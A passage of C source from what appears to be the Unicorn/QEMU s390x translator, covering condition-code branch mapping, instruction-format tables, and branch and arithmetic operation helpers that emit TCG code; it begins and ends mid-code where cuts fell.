{ TCG_COND_NEVER, TCG_COND_NEVER, /* | | x | x */ TCG_COND_NEVER, TCG_COND_NEVER, TCG_COND_NE, TCG_COND_NE, /* | NE | x | x */ TCG_COND_NE, TCG_COND_NE, TCG_COND_EQ, TCG_COND_EQ, /* EQ | | x | x */ TCG_COND_EQ, TCG_COND_EQ, TCG_COND_ALWAYS, TCG_COND_ALWAYS, /* EQ | NE | x | x */ TCG_COND_ALWAYS, TCG_COND_ALWAYS, }; /* Interpret MASK in terms of S->CC_OP, and fill in C with all the details required to generate a TCG comparison. */ static void disas_jcc(DisasContext *s, DisasCompare *c, uint32_t mask) { TCGCond cond; enum cc_op old_cc_op = s->cc_op; TCGContext *tcg_ctx = s->uc->tcg_ctx; if (mask == 15 || mask == 0) { c->cond = (mask ? TCG_COND_ALWAYS : TCG_COND_NEVER); c->u.s32.a = tcg_ctx->cc_op; c->u.s32.b = tcg_ctx->cc_op; c->g1 = c->g2 = true; c->is_64 = false; return; } /* Find the TCG condition for the mask + cc op. */ switch (old_cc_op) { case CC_OP_LTGT0_32: case CC_OP_LTGT0_64: case CC_OP_LTGT_32: case CC_OP_LTGT_64: cond = ltgt_cond[mask]; if (cond == TCG_COND_NEVER) { goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_LTUGTU_32: case CC_OP_LTUGTU_64: cond = tcg_unsigned_cond(ltgt_cond[mask]); if (cond == TCG_COND_NEVER) { goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_NZ: cond = nz_cond[mask]; if (cond == TCG_COND_NEVER) { goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_TM_32: case CC_OP_TM_64: switch (mask) { case 8: cond = TCG_COND_EQ; break; case 4 | 2 | 1: cond = TCG_COND_NE; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_ICM: switch (mask) { case 8: cond = TCG_COND_EQ; break; case 4 | 2 | 1: case 4 | 2: cond = TCG_COND_NE; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_FLOGR: switch (mask & 0xa) { case 8: /* src == 0 -> no one bit found */ cond = TCG_COND_EQ; break; case 2: /* src != 0 -> one bit found */ cond = TCG_COND_NE; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_ADDU_32: case CC_OP_ADDU_64: switch (mask) { case 8 | 2: /* vr == 0 */ cond = TCG_COND_EQ; break; case 4 | 1: /* vr != 0 */ cond = TCG_COND_NE; break; case 8 | 4: /* no carry -> vr >= src */ cond = TCG_COND_GEU; break; case 2 | 1: /* carry -> vr < src */ cond = TCG_COND_LTU; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_SUBU_32: case CC_OP_SUBU_64: /* Note that CC=0 is impossible; treat it as dont-care. */ switch (mask & 7) { case 2: /* zero -> op1 == op2 */ cond = TCG_COND_EQ; break; case 4 | 1: /* !zero -> op1 != op2 */ cond = TCG_COND_NE; break; case 4: /* borrow (!carry) -> op1 < op2 */ cond = TCG_COND_LTU; break; case 2 | 1: /* !borrow (carry) -> op1 >= op2 */ cond = TCG_COND_GEU; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; default: do_dynamic: /* Calculate cc value. */ gen_op_calc_cc(s); /* FALLTHRU */ case CC_OP_STATIC: /* Jump based on CC. We'll load up the real cond below; the assignment here merely avoids a compiler warning. */ account_noninline_branch(s, old_cc_op); old_cc_op = CC_OP_STATIC; cond = TCG_COND_NEVER; break; } /* Load up the arguments of the comparison. */ c->is_64 = true; c->g1 = c->g2 = false; switch (old_cc_op) { case CC_OP_LTGT0_32: c->is_64 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_dst); c->u.s32.b = tcg_const_i32(tcg_ctx, 0); break; case CC_OP_LTGT_32: case CC_OP_LTUGTU_32: case CC_OP_SUBU_32: c->is_64 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_src); c->u.s32.b = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.b, tcg_ctx->cc_dst); break; case CC_OP_LTGT0_64: case CC_OP_NZ: case CC_OP_FLOGR: c->u.s64.a = tcg_ctx->cc_dst; c->u.s64.b = tcg_const_i64(tcg_ctx, 0); c->g1 = true; break; case CC_OP_LTGT_64: case CC_OP_LTUGTU_64: case CC_OP_SUBU_64: c->u.s64.a = tcg_ctx->cc_src; c->u.s64.b = tcg_ctx->cc_dst; c->g1 = c->g2 = true; break; case CC_OP_TM_32: case CC_OP_TM_64: case CC_OP_ICM: c->u.s64.a = tcg_temp_new_i64(tcg_ctx); c->u.s64.b = tcg_const_i64(tcg_ctx, 0); tcg_gen_and_i64(tcg_ctx, c->u.s64.a, tcg_ctx->cc_src, tcg_ctx->cc_dst); break; case CC_OP_ADDU_32: c->is_64 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); c->u.s32.b = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_vr); if (cond == TCG_COND_EQ || cond == TCG_COND_NE) { tcg_gen_movi_i32(tcg_ctx, c->u.s32.b, 0); } else { tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.b, tcg_ctx->cc_src); } break; case CC_OP_ADDU_64: c->u.s64.a = tcg_ctx->cc_vr; c->g1 = true; if (cond == TCG_COND_EQ || cond == TCG_COND_NE) { c->u.s64.b = tcg_const_i64(tcg_ctx, 0); } else { c->u.s64.b = tcg_ctx->cc_src; c->g2 = true; } break; case CC_OP_STATIC: c->is_64 = false; c->u.s32.a = tcg_ctx->cc_op; c->g1 = true; switch (mask) { case 0x8 | 0x4 | 0x2: /* cc != 3 */ cond = TCG_COND_NE; c->u.s32.b = tcg_const_i32(tcg_ctx, 3); break; case 0x8 | 0x4 | 0x1: /* cc != 2 */ cond = TCG_COND_NE; c->u.s32.b = tcg_const_i32(tcg_ctx, 2); break; case 0x8 | 0x2 | 0x1: /* cc != 1 */ cond = TCG_COND_NE; c->u.s32.b = tcg_const_i32(tcg_ctx, 1); break; case 0x8 | 0x2: /* cc == 0 || cc == 2 => (cc & 1) == 0 */ cond = TCG_COND_EQ; c->g1 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); c->u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_andi_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_op, 1); break; case 0x8 | 0x4: /* cc < 2 */ cond = TCG_COND_LTU; c->u.s32.b = tcg_const_i32(tcg_ctx, 2); break; case 0x8: /* cc == 0 */ cond = TCG_COND_EQ; c->u.s32.b = tcg_const_i32(tcg_ctx, 0); break; case 0x4 | 0x2 | 0x1: /* cc != 0 */ cond = TCG_COND_NE; c->u.s32.b = tcg_const_i32(tcg_ctx, 0); break; case 0x4 | 0x1: /* cc == 1 || cc == 3 => (cc & 1) != 0 */ cond = TCG_COND_NE; c->g1 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); c->u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_andi_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_op, 1); break; case 0x4: /* cc == 1 */ cond = TCG_COND_EQ; c->u.s32.b = tcg_const_i32(tcg_ctx, 1); break; case 0x2 | 0x1: /* cc > 1 */ cond = TCG_COND_GTU; c->u.s32.b = tcg_const_i32(tcg_ctx, 1); break; case 0x2: /* cc == 2 */ cond = TCG_COND_EQ; c->u.s32.b = tcg_const_i32(tcg_ctx, 2); break; case 0x1: /* cc == 3 */ cond = TCG_COND_EQ; c->u.s32.b = tcg_const_i32(tcg_ctx, 3); break; default: /* CC is masked by something else: (8 >> cc) & mask. */ cond = TCG_COND_NE; c->g1 = false; c->u.s32.a = tcg_const_i32(tcg_ctx, 8); c->u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_shr_i32(tcg_ctx, c->u.s32.a, c->u.s32.a, tcg_ctx->cc_op); tcg_gen_andi_i32(tcg_ctx, c->u.s32.a, c->u.s32.a, mask); break; } break; default: abort(); } c->cond = cond; } static void free_compare(TCGContext *tcg_ctx, DisasCompare *c) { if (!c->g1) { if (c->is_64) { tcg_temp_free_i64(tcg_ctx, c->u.s64.a); } else { tcg_temp_free_i32(tcg_ctx, c->u.s32.a); } } if (!c->g2) { if (c->is_64) { tcg_temp_free_i64(tcg_ctx, c->u.s64.b); } else { tcg_temp_free_i32(tcg_ctx, c->u.s32.b); } } } /* ====================================================================== */ /* Define the insn format enumeration. */ #define F0(N) FMT_##N, #define F1(N, X1) F0(N) #define F2(N, X1, X2) F0(N) #define F3(N, X1, X2, X3) F0(N) #define F4(N, X1, X2, X3, X4) F0(N) #define F5(N, X1, X2, X3, X4, X5) F0(N) #define F6(N, X1, X2, X3, X4, X5, X6) F0(N) typedef enum { #include "insn-format.def" } DisasFormat; #undef F0 #undef F1 #undef F2 #undef F3 #undef F4 #undef F5 #undef F6 /* This is the way fields are to be accessed out of DisasFields. */ #define have_field(S, F) have_field1((S), FLD_O_##F) #define get_field(S, F) get_field1((S), FLD_O_##F, FLD_C_##F) static bool have_field1(const DisasContext *s, enum DisasFieldIndexO c) { return (s->fields.presentO >> c) & 1; } static int get_field1(const DisasContext *s, enum DisasFieldIndexO o, enum DisasFieldIndexC c) { assert(have_field1(s, o)); return s->fields.c[c]; } /* Describe the layout of each field in each format. */ typedef struct DisasField { unsigned int beg:8; unsigned int size:8; unsigned int type:2; unsigned int indexC:6; enum DisasFieldIndexO indexO:8; } DisasField; typedef struct DisasFormatInfo { DisasField op[NUM_C_FIELD]; } DisasFormatInfo; #define R(N, B) { B, 4, 0, FLD_C_r##N, FLD_O_r##N } #define M(N, B) { B, 4, 0, FLD_C_m##N, FLD_O_m##N } #define V(N, B) { B, 4, 3, FLD_C_v##N, FLD_O_v##N } #define BD(N, BB, BD) { BB, 4, 0, FLD_C_b##N, FLD_O_b##N }, \ { BD, 12, 0, FLD_C_d##N, FLD_O_d##N } #define BXD(N) { 16, 4, 0, FLD_C_b##N, FLD_O_b##N }, \ { 12, 4, 0, FLD_C_x##N, FLD_O_x##N }, \ { 20, 12, 0, FLD_C_d##N, FLD_O_d##N } #define BDL(N) { 16, 4, 0, FLD_C_b##N, FLD_O_b##N }, \ { 20, 20, 2, FLD_C_d##N, FLD_O_d##N } #define BXDL(N) { 16, 4, 0, FLD_C_b##N, FLD_O_b##N }, \ { 12, 4, 0, FLD_C_x##N, FLD_O_x##N }, \ { 20, 20, 2, FLD_C_d##N, FLD_O_d##N } #define I(N, B, S) { B, S, 1, FLD_C_i##N, FLD_O_i##N } #define L(N, B, S) { B, S, 0, FLD_C_l##N, FLD_O_l##N } #define F0(N) { { { 0 } } }, #define F1(N, X1) { { X1 } }, #define F2(N, X1, X2) { { X1, X2 } }, #define F3(N, X1, X2, X3) { { X1, X2, X3 } }, #define F4(N, X1, X2, X3, X4) { { X1, X2, X3, X4 } }, #define F5(N, X1, X2, X3, X4, X5) { { X1, X2, X3, X4, X5 } }, #define F6(N, X1, X2, X3, X4, X5, X6) { { X1, X2, X3, X4, X5, X6 } }, static const DisasFormatInfo format_info[] = { #include "insn-format.def" }; #undef F0 #undef F1 #undef F2 #undef F3 #undef F4 #undef F5 #undef F6 #undef R #undef M #undef V #undef BD #undef BXD #undef BDL #undef BXDL #undef I #undef L /* Generally, we'll extract operands into this structures, operate upon them, and store them back. See the "in1", "in2", "prep", "wout" sets of routines below for more details. */ typedef struct { bool g_out, g_out2, g_in1, g_in2; TCGv_i64 out, out2, in1, in2; TCGv_i64 addr1; } DisasOps; /* Instructions can place constraints on their operands, raising specification exceptions if they are violated. To make this easy to automate, each "in1", "in2", "prep", "wout" helper will have a SPEC_<name> define that equals one of the following, or 0. To make this easy to document, we'll put the SPEC_<name> defines next to <name>. */ #define SPEC_r1_even 1 #define SPEC_r2_even 2 #define SPEC_r3_even 4 #define SPEC_r1_f128 8 #define SPEC_r2_f128 16 /* Return values from translate_one, indicating the state of the TB. */ /* We are not using a goto_tb (for whatever reason), but have updated the PC (for whatever reason), so there's no need to do it again on exiting the TB. */ #define DISAS_PC_UPDATED DISAS_TARGET_0 /* We have emitted one or more goto_tb. No fixup required. */ #define DISAS_GOTO_TB DISAS_TARGET_1 /* We have updated the PC and CC values. */ #define DISAS_PC_CC_UPDATED DISAS_TARGET_2 /* We are exiting the TB, but have neither emitted a goto_tb, nor updated the PC for the next instruction to be executed. */ #define DISAS_PC_STALE DISAS_TARGET_3 /* We are exiting the TB to the main loop. */ #define DISAS_PC_STALE_NOCHAIN DISAS_TARGET_4 #define DISAS_UNICORN_HALT DISAS_TARGET_11 /* Instruction flags */ #define IF_AFP1 0x0001 /* r1 is a fp reg for HFP/FPS instructions */ #define IF_AFP2 0x0002 /* r2 is a fp reg for HFP/FPS instructions */ #define IF_AFP3 0x0004 /* r3 is a fp reg for HFP/FPS instructions */ #define IF_BFP 0x0008 /* binary floating point instruction */ #define IF_DFP 0x0010 /* decimal floating point instruction */ #define IF_PRIV 0x0020 /* privileged instruction */ #define IF_VEC 0x0040 /* vector instruction */ struct DisasInsn { unsigned opc:16; unsigned flags:16; DisasFormat fmt:8; unsigned fac:8; unsigned spec:8; const char *name; /* Pre-process arguments before HELP_OP. */ void (*help_in1)(DisasContext *, DisasOps *); void (*help_in2)(DisasContext *, DisasOps *); void (*help_prep)(DisasContext *, DisasOps *); /* * Post-process output after HELP_OP. * Note that these are not called if HELP_OP returns DISAS_NORETURN. */ void (*help_wout)(DisasContext *, DisasOps *); void (*help_cout)(DisasContext *, DisasOps *); /* Implement the operation itself. */ DisasJumpType (*help_op)(DisasContext *, DisasOps *); uint64_t data; }; /* ====================================================================== */ /* Miscellaneous helpers, used by several operations. */ static DisasJumpType help_goto_direct(DisasContext *s, uint64_t dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (dest == s->pc_tmp) { per_branch(s, true); return DISAS_NEXT; } if (use_goto_tb(s, dest)) { update_cc_op(s); per_breaking_event(s); tcg_gen_goto_tb(tcg_ctx, 0); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, dest); tcg_gen_exit_tb(tcg_ctx, s->base.tb, 0); return DISAS_GOTO_TB; } else { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, dest); per_branch(s, false); return DISAS_PC_UPDATED; } } static DisasJumpType help_branch(DisasContext *s, DisasCompare *c, bool is_imm, int imm, TCGv_i64 cdest) { DisasJumpType ret; uint64_t dest = s->base.pc_next + (int64_t)imm * 2; TCGLabel *lab; TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Take care of the special cases first. */ if (c->cond == TCG_COND_NEVER) { ret = DISAS_NEXT; goto egress; } if (is_imm) { if (dest == s->pc_tmp) { /* Branch to next. */ per_branch(s, true); ret = DISAS_NEXT; goto egress; } if (c->cond == TCG_COND_ALWAYS) { ret = help_goto_direct(s, dest); goto egress; } } else { if (!cdest) { /* E.g. bcr %r0 -> no branch. */ ret = DISAS_NEXT; goto egress; } if (c->cond == TCG_COND_ALWAYS) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->psw_addr, cdest); per_branch(s, false); ret = DISAS_PC_UPDATED; goto egress; } } if (use_goto_tb(s, s->pc_tmp)) { if (is_imm && use_goto_tb(s, dest)) { /* Both exits can use goto_tb. */ update_cc_op(s); lab = gen_new_label(tcg_ctx); if (c->is_64) { tcg_gen_brcond_i64(tcg_ctx, c->cond, c->u.s64.a, c->u.s64.b, lab); } else { tcg_gen_brcond_i32(tcg_ctx, c->cond, c->u.s32.a, c->u.s32.b, lab); } /* Branch not taken. */ tcg_gen_goto_tb(tcg_ctx, 0); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, s->pc_tmp); tcg_gen_exit_tb(tcg_ctx, s->base.tb, 0); /* Branch taken. */ gen_set_label(tcg_ctx, lab); per_breaking_event(s); tcg_gen_goto_tb(tcg_ctx, 1); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, dest); tcg_gen_exit_tb(tcg_ctx, s->base.tb, 1); ret = DISAS_GOTO_TB; } else { /* Fallthru can use goto_tb, but taken branch cannot. */ /* Store taken branch destination before the brcond. This avoids having to allocate a new local temp to hold it. We'll overwrite this in the not taken case anyway. */ if (!is_imm) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->psw_addr, cdest); } lab = gen_new_label(tcg_ctx); if (c->is_64) { tcg_gen_brcond_i64(tcg_ctx, c->cond, c->u.s64.a, c->u.s64.b, lab); } else { tcg_gen_brcond_i32(tcg_ctx, c->cond, c->u.s32.a, c->u.s32.b, lab); } /* Branch not taken. */ update_cc_op(s); tcg_gen_goto_tb(tcg_ctx, 0); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, s->pc_tmp); tcg_gen_exit_tb(tcg_ctx, s->base.tb, 0); gen_set_label(tcg_ctx, lab); if (is_imm) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, dest); } per_breaking_event(s); ret = DISAS_PC_UPDATED; } } else { /* Fallthru cannot use goto_tb. This by itself is vanishingly rare. Most commonly we're single-stepping or some other condition that disables all use of goto_tb. Just update the PC and exit. */ TCGv_i64 next = tcg_const_i64(tcg_ctx, s->pc_tmp); if (is_imm) { cdest = tcg_const_i64(tcg_ctx, dest); } if (c->is_64) { tcg_gen_movcond_i64(tcg_ctx, c->cond, tcg_ctx->psw_addr, c->u.s64.a, c->u.s64.b, cdest, next); per_branch_cond(s, c->cond, c->u.s64.a, c->u.s64.b); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 z = tcg_const_i64(tcg_ctx, 0); tcg_gen_setcond_i32(tcg_ctx, c->cond, t0, c->u.s32.a, c->u.s32.b); tcg_gen_extu_i32_i64(tcg_ctx, t1, t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, tcg_ctx->psw_addr, t1, z, cdest, next); per_branch_cond(s, TCG_COND_NE, t1, z); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, z); } if (is_imm) { tcg_temp_free_i64(tcg_ctx, cdest); } tcg_temp_free_i64(tcg_ctx, next); ret = DISAS_PC_UPDATED; } egress: free_compare(tcg_ctx, c); return ret; } /* ====================================================================== */ /* The operations. These perform the bulk of the work for any insn, usually after the operands have been loaded and output initialized. */ static DisasJumpType op_abs(DisasContext *s, DisasOps *o) { tcg_gen_abs_i64(s->uc->tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_absf32(DisasContext *s, DisasOps *o) { tcg_gen_andi_i64(s->uc->tcg_ctx, o->out, o->in2, 0x7fffffffull); return DISAS_NEXT; } static DisasJumpType op_absf64(DisasContext *s, DisasOps *o) { tcg_gen_andi_i64(s->uc->tcg_ctx, o->out, o->in2, 0x7fffffffffffffffull); return DISAS_NEXT; } static DisasJumpType op_absf128(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_andi_i64(tcg_ctx, o->out, o->in1, 0x7fffffffffffffffull); tcg_gen_mov_i64(tcg_ctx, o->out2, o->in2); return DISAS_NEXT; } static DisasJumpType op_add(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_add_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_addc(DisasContext *s, DisasOps *o) { DisasCompare cmp; TCGv_i64 carry; TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_add_i64(tcg_ctx, o->out, o->in1, o->in2); /* The carry flag is the msb of CC, therefore the branch mask that would create that comparison is 3. Feeding the generated comparison to setcond produces the carry flag that we desire. */ disas_jcc(s, &cmp, 3); carry = tcg_temp_new_i64(tcg_ctx); if (cmp.is_64) { tcg_gen_setcond_i64(tcg_ctx, cmp.cond, carry, cmp.u.s64.a, cmp.u.s64.b); } else { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, cmp.cond, t, cmp.u.s32.a, cmp.u.s32.b); tcg_gen_extu_i32_i64(tcg_ctx, carry, t); tcg_temp_free_i32(tcg_ctx, t); } free_compare(tcg_ctx, &cmp); tcg_gen_add_i64(tcg_ctx, o->out, o->out, carry); tcg_temp_free_i64(tcg_ctx, carry); return DISAS_NEXT; } static DisasJumpType op_asi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); if (!s390_has_feat(s->uc, S390_FEAT_STFLE_45)) { tcg_gen_qemu_ld_tl(tcg_ctx, o->in1, o->addr1, get_mem_index(s), s->insn->data); } else { /* Perform the atomic addition in memory. */ tcg_gen_atomic_fetch_add_i64(tcg_ctx, o->in1, o->addr1, o->in2, get_mem_index(s), s->insn->data); } /* Recompute also for atomic case: needed for setting CC. */ tcg_gen_add_i64(tcg_ctx, o->out, o->in1, o->in2); if (!s390_has_feat(s->uc, S390_FEAT_STFLE_45)) { tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), s->insn->data); } return DISAS_NEXT; } static DisasJumpType op_aeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_aeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_adb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_adb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_axb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_axb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_and(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_and_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_andi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int shift = s->insn->data & 0xff; int size = s->insn->data >> 8; uint64_t mask = ((1ull << size) - 1) << shift; assert(!o->g_in2); tcg_gen_shli_i64(tcg_ctx, o->in2, o->in2, shift); tcg_gen_ori_i64(tcg_ctx, o->in2, o->in2, ~mask); tcg_gen_and_i64(tcg_ctx, o->out, o->in1, o->in2); /* Produce the CC from only the bits manipulated. */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cc_dst, o->out, mask); set_cc_nz_u64(s, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_ni(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_ld_tl(tcg_ctx, o->in1, o->addr1, get_mem_index(s), s->insn->data); } else { /* Perform the atomic operation in memory. */ tcg_gen_atomic_fetch_and_i64(tcg_ctx, o->in1, o->addr1, o->in2, get_mem_index(s), s->insn->data); } /* Recompute also for atomic case: needed for setting CC. */ tcg_gen_and_i64(tcg_ctx, o->out, o->in1, o->in2); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), s->insn->data); } return DISAS_NEXT; } static DisasJumpType op_bas(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; pc_to_link_info(tcg_ctx, o->out, s, s->pc_tmp); if (o->in2) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->psw_addr, o->in2); per_branch(s, false); return DISAS_PC_UPDATED; } else { return DISAS_NEXT; } } static void save_link_info(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t; if (s->base.tb->flags & (FLAG_MASK_32 | FLAG_MASK_64)) { pc_to_link_info(tcg_ctx, o->out, s, s->pc_tmp); return; } gen_op_calc_cc(s); tcg_gen_andi_i64(tcg_ctx, o->out, o->out, 0xffffffff00000000ull); tcg_gen_ori_i64(tcg_ctx, o->out, o->out, ((s->ilen / 2) << 30) | s->pc_tmp); t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->psw_mask, 16); tcg_gen_andi_i64(tcg_ctx, t, t, 0x0f000000); tcg_gen_or_i64(tcg_ctx, o->out, o->out, t); tcg_gen_extu_i32_i64(tcg_ctx, t, tcg_ctx->cc_op); tcg_gen_shli_i64(tcg_ctx, t, t, 28); tcg_gen_or_i64(tcg_ctx, o->out, o->out, t); tcg_temp_free_i64(tcg_ctx, t); } static DisasJumpType op_bal(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; save_link_info(s, o); if (o->in2) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->psw_addr, o->in2); per_branch(s, false); return DISAS_PC_UPDATED; } else { return DISAS_NEXT; } } static DisasJumpType op_basi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; pc_to_link_info(tcg_ctx, o->out, s, s->pc_tmp); return help_goto_direct(s, s->base.pc_next + (int64_t)get_field(s, i2) * 2); } static DisasJumpType op_bc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m1 = get_field(s, m1); bool is_imm = have_field(s, i2); int imm = is_imm ? get_field(s, i2) : 0; DisasCompare c; /* BCR with R2 = 0 causes no branching */ if (have_field(s, r2) && get_field(s, r2) == 0) { if (m1 == 14) { /* Perform serialization */ /* FIXME: check for fast-BCR-serialization facility */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); } if (m1 == 15) { /* Perform serialization */ /* FIXME: perform checkpoint-synchronisation */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); } return DISAS_NEXT; } disas_jcc(s, &c, m1); return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_bct32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); bool is_imm = have_field(s, i2); int imm = is_imm ? get_field(s, i2) : 0; DisasCompare c; TCGv_i64 t; c.cond = TCG_COND_NE; c.is_64 = false; c.g1 = false; c.g2 = false; t = tcg_temp_new_i64(tcg_ctx); tcg_gen_subi_i64(tcg_ctx, t, tcg_ctx->regs[r1], 1); store_reg32_i64(tcg_ctx, r1, t); c.u.s32.a = tcg_temp_new_i32(tcg_ctx); c.u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_extrl_i64_i32(tcg_ctx, c.u.s32.a, t); tcg_temp_free_i64(tcg_ctx, t); return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_bcth(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int imm = get_field(s, i2); DisasCompare c; TCGv_i64 t; c.cond = TCG_COND_NE; c.is_64 = false; c.g1 = false; c.g2 = false; t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->regs[r1], 32); tcg_gen_subi_i64(tcg_ctx, t, t, 1); store_reg32h_i64(tcg_ctx, r1, t); c.u.s32.a = tcg_temp_new_i32(tcg_ctx); c.u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_extrl_i64_i32(tcg_ctx, c.u.s32.a, t); tcg_temp_free_i64(tcg_ctx, t); return help_branch(s, &c, 1, imm, o->in2); } static DisasJumpType op_bct64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); bool is_imm = have_field(s, i2); int imm = is_imm ? get_field(s, i2) : 0; DisasCompare c; c.cond = TCG_COND_NE; c.is_64 = true; c.g1 = true; c.g2 = false; tcg_gen_subi_i64(tcg_ctx, tcg_ctx->regs[r1], tcg_ctx->regs[r1], 1); c.u.s64.a = tcg_ctx->regs[r1]; c.u.s64.b = tcg_const_i64(tcg_ctx, 0); return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_bx32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); bool is_imm = have_field(s, i2); int imm = is_imm ? get_field(s, i2) : 0; DisasCompare c; TCGv_i64 t; c.cond = (s->insn->data ? TCG_COND_LE : TCG_COND_GT); c.is_64 = false; c.g1 = false; c.g2 = false; t = tcg_temp_new_i64(tcg_ctx); tcg_gen_add_i64(tcg_ctx, t, tcg_ctx->regs[r1], tcg_ctx->regs[r3]); c.u.s32.a = tcg_temp_new_i32(tcg_ctx); c.u.s32.b = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c.u.s32.a, t); tcg_gen_extrl_i64_i32(tcg_ctx, c.u.s32.b, tcg_ctx->regs[r3 | 1]); store_reg32_i64(tcg_ctx, r1, t); tcg_temp_free_i64(tcg_ctx, t); return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_bx64(DisasContext *s, DisasOps 